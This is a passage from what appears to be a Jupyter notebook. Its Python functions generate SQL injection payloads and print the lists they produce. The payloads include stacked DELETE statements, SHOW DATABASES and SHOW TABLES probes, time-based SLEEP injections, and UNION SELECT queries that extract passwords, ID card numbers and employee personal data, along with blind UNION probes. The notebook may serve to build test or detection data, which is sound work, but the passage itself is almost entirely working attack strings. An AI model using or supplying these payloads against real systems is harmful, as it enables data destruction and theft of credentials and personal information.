 '"; DELETE FROM employee WHERE tel = 0370163658-- ',
 '"; DELETE FROM service WHERE name = "rpBAYZo"# ',
 '"; DELETE FROM users WHERE username = "FXan"-- ',
 '"; DELETE FROM customer WHERE fname = "NOVKWHqPhoMXzgV"# ',
 '"; DELETE FROM users WHERE password = "PbE7y9WoGxQjGX"-- ',
 '"; DELETE FROM customer WHERE customer_id = "TnKAIhcAUp"-- ',
 '"; DELETE FROM employee WHERE graduation_certificate = "hPPA6M3kCcMm"# ',
 '"; DELETE FROM users WHERE password = "vI9tfNZfJIVMW"# ',
 '"; DELETE FROM employee WHERE lname = "FTiqTIWl"#',
 '"; DELETE FROM employee WHERE lname = "ykFDzolsfVk"#',
 '"; DELETE FROM service WHERE price = 597-- ',
 '"; DELETE FROM employee WHERE work_background = "o2AJJFClBouCn"#',
 '"; DELETE FROM employee WHERE address = "gdJXsCHXuzR"#',
 '"; DELETE FROM customer WHERE fname = "uvYxV"#',
 '"; DELETE FROM employee WHERE work_background = "TwH71BPIS"#',
 '"; DELETE FROM employee WHERE tel = 0824912680-- ',
 '"; DELETE FROM users WHERE username = "RGxaPR"-- ',
 '"; DELETE FROM users WHERE username = "gofOhKw"-- ',
 '"; DELETE FROM customer WHERE tel = 0627272550#',
 '"; DELETE FROM users WHERE password = "lhor"#',
 '"; DELETE FROM users WHERE password = "IKD9Q8FWxTiX"-- ',
 '"; DELETE FROM users WHERE username = "mumyIjLSaTJ"#',
 '"; DELETE FROM service WHERE price = 461-- ',
 '"; DELETE FROM users WHERE username = "JAkEcZEV"#',
 '"; DELETE FROM service WHERE price = 886# ',
 '"; DELETE FROM customer WHERE fname = "MmZfIrVoAyVsX"# ',
 '"; DELETE FROM customer WHERE lname = "euejuUwPgKyV"-- ',
 '"; DELETE FROM customer WHERE lname = "PchASnHChbWkhQa"#',
 '"; DELETE FROM users WHERE username = "tzVXweogUzv"#',
 '"; DELETE FROM service WHERE price = 124-- ',
 '"; DELETE FROM service WHERE name = "VvDJEvpyj"#',
 '"; DELETE FROM customer WHERE fname = "nDaHRHOjy"# ',
 '"; DELETE FROM service WHERE name = "YDLoVCPUDsWS"# ',
 '"; DELETE FROM service WHERE price = 279#',
 '"; DELETE FROM customer WHERE email = "YMxRzHNcU937"-- ',
 '"; DELETE FROM service WHERE price = 879#',
 '"; DELETE FROM employee WHERE lname = "WUBVdkqup"-- ',
 '"; DELETE FROM service WHERE name = "ExGgnQbjrw"-- ',
 '"; DELETE FROM customer WHERE tel = 0414620600# ',
 '"; DELETE FROM customer WHERE email = "zSltRqTa8o6"#',
 '"; DELETE FROM users WHERE username = "QeLkgFrozPVxcJ"-- ',
 '"; DELETE FROM service WHERE name = "brwO"-- ',
 '"; DELETE FROM customer WHERE fname = "DxNxpIJRN"-- ',
 '"; DELETE FROM customer WHERE tel = 0349961575# ',
 '"; DELETE FROM employee WHERE address = "gVM2l"-- ',
 '"; DELETE FROM users WHERE password = "oavz"-- ',
 '"; DELETE FROM users WHERE password = "YNcY4Czlo2KFjIv"-- ',
 '"; DELETE FROM customer WHERE tel = 0811542203# ',
 '"; DELETE FROM service WHERE price = 230-- ',
 '"; DELETE FROM customer WHERE email = "MYfrMrAa9uvxoI"#',
 '"; DELETE FROM service WHERE name = "VOlqfPKPsnSBH"-- ',
 '"; DELETE FROM customer WHERE lname = "SzNBKsiFwKHSg"#',
 '"; DELETE FROM service WHERE price = 479# ',
 '"; DELETE FROM service WHERE price = 149#',
 '"; DELETE FROM employee WHERE email = "vBjRMBh"-- ',
 '"; DELETE FROM employee WHERE id_card = 1891504649494#',
 '"; DELETE FROM customer WHERE tel = 0757830782# ',
 '"; DELETE FROM service WHERE name = "isyZwEGdzwmYsM"-- ',
 '"; DELETE FROM service WHERE name = "hRWUyeLJ"#',
 '"; DELETE FROM customer WHERE fname = "YmyXhxRTGrOb"-- ',
 '"; DELETE FROM users WHERE password = "kJc07ic"-- ',
 '"; DELETE FROM service WHERE price = 365# ',
 '"; DELETE FROM users WHERE password = "BQm5M9m"-- ',
 '"; DELETE FROM customer WHERE tel = 0554896064#',
 '"; DELETE FROM users WHERE password = "UuFD"# ',
 '"; DELETE FROM service WHERE name = "xYETwDAYxeg"# ']

In [38]:
def randomShowForSearch(showList, last):
    gen=[]
    for i in range(100) :
        preStr =""
        random_show=showList[random.randint(0, len(showList)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += "\"; " + "SHOW " + random_show + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [39]:
randomShowForSearch(showList, last)

['"; SHOW DATABASES-- ',
 '"; SHOW TABLES# ',
 '"; SHOW COLUME# ',
 '"; SHOW COLUME-- ',
 '"; SHOW DATABASES# ',
 '"; SHOW TABLES-- ',
 '"; SHOW DATABASES#',
 '"; SHOW COLUME#',
 '"; SHOW TABLES#']

In [43]:
def randomWaitForSearch(showList, last):
    gen=[]
    for i in range(20) :
        preStr =""
        time = random.randint(1, 15)
        preStr += '"; ' + "SELECT SLEEP(" + str(time) + ")"
        random_last=last[random.randint(0, len(last)-1)]
        preStr += random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [44]:
randomWaitForSearch(showList, last)

['"; SELECT SLEEP(9)#',
 '"; SELECT SLEEP(7)-- ',
 '"; SELECT SLEEP(1)-- ',
 '"; SELECT SLEEP(1)#',
 '"; SELECT SLEEP(10)#',
 '"; SELECT SLEEP(6)#',
 '"; SELECT SLEEP(4)#',
 '"; SELECT SLEEP(9)-- ',
 '"; SELECT SLEEP(13)-- ',
 '"; SELECT SLEEP(2)# ',
 '"; SELECT SLEEP(8)# ',
 '"; SELECT SLEEP(13)#',
 '"; SELECT SLEEP(3)-- ',
 '"; SELECT SLEEP(5)#',
 '"; SELECT SLEEP(5)-- ']

In [29]:
def randomWaitUnionForSearch(showList, last):
    gen=[]
    for i in range(30) :
        preStr =""
        time = random.randint(1, 15)
        preStr += '" UNION SELECT SLEEP(' + str(time) + ")"
        numOfParam = random.randint(0, 7)
        for j in range(numOfParam):
            preStr += ',' + str(random.randint(1, 9))
        random_last=last[random.randint(0, len(last)-1)]
        preStr += random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [30]:
randomWaitUnionForSearch(showList, last)

['" UNION SELECT SLEEP(15),5,4,2,6,2-- ',
 '" UNION SELECT SLEEP(8),8,9,8,2,6,9-- ',
 '" UNION SELECT SLEEP(1),9#',
 '" UNION SELECT SLEEP(6),9# ',
 '" UNION SELECT SLEEP(9),4,1,2,5,2,6,4-- ',
 '" UNION SELECT SLEEP(11),2,9#',
 '" UNION SELECT SLEEP(14),5,6,8,9# ',
 '" UNION SELECT SLEEP(13),1,1,4,4#',
 '" UNION SELECT SLEEP(10),8,7,7,8,6# ',
 '" UNION SELECT SLEEP(11),9,8,4,5,1# ',
 '" UNION SELECT SLEEP(8),1,8,2,4,2# ',
 '" UNION SELECT SLEEP(6),9,3,9,3,8-- ',
 '" UNION SELECT SLEEP(6),5,2#',
 '" UNION SELECT SLEEP(5),8,3,7,1,3,8,4# ',
 '" UNION SELECT SLEEP(12)#',
 '" UNION SELECT SLEEP(6),7,8,9,7,6,3,6# ',
 '" UNION SELECT SLEEP(5),8,2,8,1,3,4,6#',
 '" UNION SELECT SLEEP(3),5,1,1,3,7#',
 '" UNION SELECT SLEEP(5),3-- ',
 '" UNION SELECT SLEEP(3)-- ',
 '" UNION SELECT SLEEP(3),7,7,8,6,2,4,2-- ',
 '" UNION SELECT SLEEP(1),3# ',
 '" UNION SELECT SLEEP(2),5,6,9,1,9,9,3#',
 '" UNION SELECT SLEEP(7)# ',
 '" UNION SELECT SLEEP(12),3,3-- ',
 '" UNION SELECT SLEEP(5),3,3,7,6# ',
 '" UNION SELECT SLEEP(10),5,8,1,6,8,6,9-- ',
 '" UNION SELECT SLEEP(13),8,5,8,9# ',
 '" UNION SELECT SLEEP(11),9,8,9,4,7,3,7# ',
 '" UNION SELECT SLEEP(14),1,5,2,7,8,5,7# ']

In [31]:
def randomUnionForUrl(table, table_value, last):
    gen=[]
    for i in range(100) :
        typeOfValue=[]
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += '";'+" UNION SELECT "
        
        numOfParam=random.randint(0, len(table_value[random_table])-1)
        if (numOfParam == 0):
            preStr += "*" + " FROM " + random_table + "" + random_last
        else:
            for j in range(numOfParam) :
                while True:
                    random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                    if random_table_value not in preStr:
                        typeOfValue.append(type_of_value[random_table_value])
                        break
                    continue 
                    
                preStr += random_table_value
                if j != numOfParam-1 :
                    preStr += ", "
            preStr += " FROM " + random_table
            preStr += "" + random_last

            if preStr in gen:
                continue
            else:
                gen.append(preStr)
    return gen

In [32]:
randomUnionForUrl(table, table_value, last)

['"; UNION SELECT house_registration, employee_id, id_card, nickname, lname, address, fname, prefixname FROM employee-- ',
 '"; UNION SELECT address, email FROM employee# ',
 '"; UNION SELECT name FROM service# ',
 '"; UNION SELECT username FROM users# ',
 '"; UNION SELECT customer_id, email, lname FROM customer# ',
 '"; UNION SELECT id_card, prefixname, lname, employee_id, fname FROM employee-- ',
 '"; UNION SELECT address, id_card FROM employee#',
 '"; UNION SELECT customer_id, lname FROM customer-- ',
 '"; UNION SELECT name FROM service-- ',
 '"; UNION SELECT email, customer_id, tel FROM customer-- ',
 '"; UNION SELECT price FROM service#',
 '"; UNION SELECT tel, email, customer_id FROM customer# ',
 '"; UNION SELECT address, fname, employee_id, prefixname, graduation_certificate FROM employee# ',
 '"; UNION SELECT price FROM service# ',
 '"; UNION SELECT lname, id_card, tel, graduation_certificate, house_registration, fname, address FROM employee-- ',
 '"; UNION SELECT address FROM employee# ',
 '"; UNION SELECT name FROM service#',
 '"; UNION SELECT lname, email, fname, customer_id FROM customer-- ',
 '"; UNION SELECT email, address, graduation_certificate, nickname FROM employee-- ',
 '"; UNION SELECT username FROM users-- ',
 '"; UNION SELECT id_card, tel, graduation_certificate, email, house_registration, work_background, fname, nickname FROM employee# ',
 '"; UNION SELECT house_registration, graduation_certificate, address, work_background, tel FROM employee#',
 '"; UNION SELECT prefixname, lname, nickname, house_registration, work_background, fname, id_card, employee_id, graduation_certificate, email FROM employee-- ',
 '"; UNION SELECT nickname, graduation_certificate, work_background, tel, address FROM employee# ',
 '"; UNION SELECT price FROM service-- ',
 '"; UNION SELECT password FROM users#',
 '"; UNION SELECT email, lname FROM customer#',
 '"; UNION SELECT fname, customer_id FROM customer#',
 '"; UNION SELECT tel, lname, prefixname, id_card, graduation_certificate FROM employee-- ',
 '"; UNION SELECT email FROM employee#',
 '"; UNION SELECT employee_id, id_card, work_background, house_registration, graduation_certificate FROM employee# ',
 '"; UNION SELECT email FROM customer-- ',
 '"; UNION SELECT graduation_certificate, house_registration, email, tel, fname, prefixname, id_card FROM employee# ',
 '"; UNION SELECT customer_id, fname, email FROM customer-- ',
 '"; UNION SELECT password FROM users# ',
 '"; UNION SELECT customer_id FROM customer#',
 '"; UNION SELECT lname FROM employee-- ',
 '"; UNION SELECT lname FROM customer-- ',
 '"; UNION SELECT tel, customer_id, fname FROM customer-- ',
 '"; UNION SELECT email FROM customer# ',
 '"; UNION SELECT fname, lname, customer_id FROM customer-- ',
 '"; UNION SELECT id_card, employee_id, work_background, address, email FROM employee-- ',
 '"; UNION SELECT house_registration, employee_id, tel, lname, address, prefixname FROM employee#',
 '"; UNION SELECT fname FROM customer# ',
 '"; UNION SELECT house_registration, graduation_certificate, tel, fname, nickname, work_background, id_card, address, lname FROM employee-- ',
 '"; UNION SELECT graduation_certificate, tel, address, employee_id, nickname, work_background FROM employee-- ',
 '"; UNION SELECT address FROM employee-- ',
 '"; UNION SELECT address, employee_id, id_card, fname, graduation_certificate, lname FROM employee# ',
 '"; UNION SELECT password FROM users-- ',
 '"; UNION SELECT lname, tel, prefixname FROM employee# ',
 '"; UNION SELECT tel, customer_id, lname FROM customer# ',
 '"; UNION SELECT email, graduation_certificate, nickname, tel, employee_id, lname, address, house_registration FROM employee# ',
 '"; UNION SELECT employee_id, graduation_certificate, address, prefixname, id_card, tel, nickname, fname, lname, email, work_background FROM employee-- ']

In [19]:
def randomUnionForBlind(table, table_value, last):
    gen=[]
    for i in range(100) :
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += '";'+" UNION SELECT "
        
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :   
            preStr += "1"
            if j != numOfParam-1 :
                preStr += ", "
        preStr += " FROM " + random_table
        preStr += "" + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [20]:
randomUnionForBlind(table, table_value, last)

['"; UNION SELECT 1 FROM users# ',
 '"; UNION SELECT 1 FROM service# ',
 '"; UNION SELECT 1, 1 FROM customer# ',
 '"; UNION SELECT 1 FROM service-- ',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '"; UNION SELECT 1 FROM service#',
 '"; UNION SELECT 1 FROM users-- ',
 '"; UNION SELECT 1, 1 FROM employee# ',
 '"; UNION SELECT 1, 1 FROM customer-- ',
 '"; UNION SELECT 1, 1, 1 FROM customer#',
 '"; UNION SELECT 1 FROM users#',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1 FROM employee# ',
 '"; UNION SELECT 1, 1, 1 FROM employee# ',
 '"; UNION SELECT 1, 1, 1 FROM customer-- ',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '"; UNION SELECT 1, 1, 1, 1 FROM employee#',
 '"; UNION SELECT 1, 1, 1 FROM customer# ',
 '"; UNION SELECT 1 FROM customer-- ',
 '"; UNION SELECT 1 FROM customer#',
 '"; UNION SELECT 1, 1, 1, 1 FROM customer-- ',
 '"; UNION SELECT 1, 1, 1 FROM employee#',
 '"; UNION SELECT 1, 1, 1, 1, 1 FROM employee# ',
 '"; UNION SELECT 1, 1 FROM employee-- ',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '"; UNION SELECT 1 FROM employee#',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '"; UNION SELECT 1, 1, 1, 1, 1 FROM employee#',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '"; UNION SELECT 1, 1, 1, 1 FROM customer#',
 '"; UNION SELECT 1, 1, 1 FROM employee-- ',
 '"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee# ',
 '"; UNION SELECT 1 FROM employee-- ']